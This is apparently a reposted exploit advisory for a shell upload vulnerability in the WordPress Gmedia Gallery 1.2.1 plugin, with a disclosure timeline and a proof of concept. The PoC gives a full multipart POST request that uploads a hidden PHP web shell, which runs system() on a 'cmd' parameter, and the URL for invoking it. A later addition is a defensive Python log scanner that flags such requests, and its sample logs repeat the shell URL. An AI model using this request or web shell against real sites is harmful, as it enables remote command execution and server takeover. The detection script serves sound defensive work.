Holigano
Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability
Code:
# Exploit Title : Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.codeasily.com/
# Software Link : http://downloads.wordpress.org/plugin/grand-media.zip
# Date : 2014-08-01
# Tested on : Windows 7 / Mozilla Firefox
######################
# Description :
Any user could upload php files (administrator by default).
######################
# Vulnerability Disclosure Timeline:
2014-08-01: Discovered vulnerability
2014-08-01: Vendor Notification (Twitter)
2014-08-01: Vendor Response/Feedback
2014-08-02: Vendor Fix/Patch
2014-08-02: Public Disclosure
######################
# PoC:
POST
Host=127.0.0.1
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
Referer=http://127.0.0.1/wordpress/wp-admin/admin.php?page=GrandMedia_AddMedia
Content-Length=916
Content-Type=multipart/form-data; boundary=---------------------------304431219031197
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7; wp-settings-time-1=1406915840
Connection=keep-alive
Pragma=no-cache
Cache-Control=no-cache
POSTDATA =-----------------------------304431219031197
Content-Disposition: form-data; name="name"
.shell.php
-----------------------------304431219031197
Content-Disposition: form-data; name="chunk"
0
-----------------------------304431219031197
Content-Disposition: form-data; name="chunks"
1
-----------------------------304431219031197
Content-Disposition: form-data; name="params"
terms%5Bgmedia_category%5D=&terms%5Bgmedia_album%5D=&terms%5Bgmedia_tag%5D=
-----------------------------304431219031197
Content-Disposition: form-data; name="file"; filename=".shell.php"
Content-Type: application/octet-stream
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
-----------------------------304431219031197--
Backdoor location:
http://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd
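A defender's view of the "Backdoor location" above, as an added example that is not part of the original advisory or forum post: a log check that flags requests for PHP-handled or dot-prefixed files under wp-content/grand-media/, a directory that should serve media only. The Combined Log Format, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Combined Log Format prefix: client ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Directory taken from the advisory's "Backdoor location"; it should hold media only.
UPLOAD_DIR = "/wp-content/grand-media/"
# Extensions often mapped to the PHP handler (assumption: adjust to the server config).
# The trailing "." alternative also catches double extensions such as name.php.jpg.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.I)

def classify(line):
    """Return a finding for a request to a script or dotfile in the upload dir."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, status = m.groups()
    parts = urlsplit(target)
    path = unquote(parts.path)  # decode %2e and similar before matching
    if UPLOAD_DIR not in path:
        return None
    segs = [s for s in path.split(UPLOAD_DIR, 1)[1].split("/") if s]
    reasons = []
    if any(SCRIPT_EXT.search(s) for s in segs):
        reasons.append("script-extension")
    if any(s.startswith(".") and s not in (".", "..") for s in segs):
        reasons.append("dotfile")
    if not reasons:
        return None
    if parts.query:
        reasons.append("has-query")  # static media rarely takes parameters
    # A 2xx status means the server answered from that file: likely execution.
    return {"client": client, "method": method, "path": path,
            "status": int(status), "served": status.startswith("2"), "reasons": reasons}

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (not from the original post); documentation IP ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Aug/2014:10:01:12 +0000] "GET /wordpress/wp-content/grand-media/image/cat.jpg HTTP/1.1" 200 48211 "-" "-"',
    '203.0.113.7 - - [02/Aug/2014:10:02:40 +0000] "GET /wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd HTTP/1.1" 200 31 "-" "-"',
    '198.51.100.4 - - [02/Aug/2014:10:05:03 +0000] "GET /wordpress/wp-content/grand-media/application/%2eshell.PHP5 HTTP/1.1" 403 199 "-" "-"',
    '198.51.100.4 - - [02/Aug/2014:10:06:00 +0000] "GET /wordpress/wp-admin/admin.php?page=GrandMedia_AddMedia HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `served` set to true is the one to triage first; a 403 or 404 on the same path pattern still shows someone probing for an uploaded script.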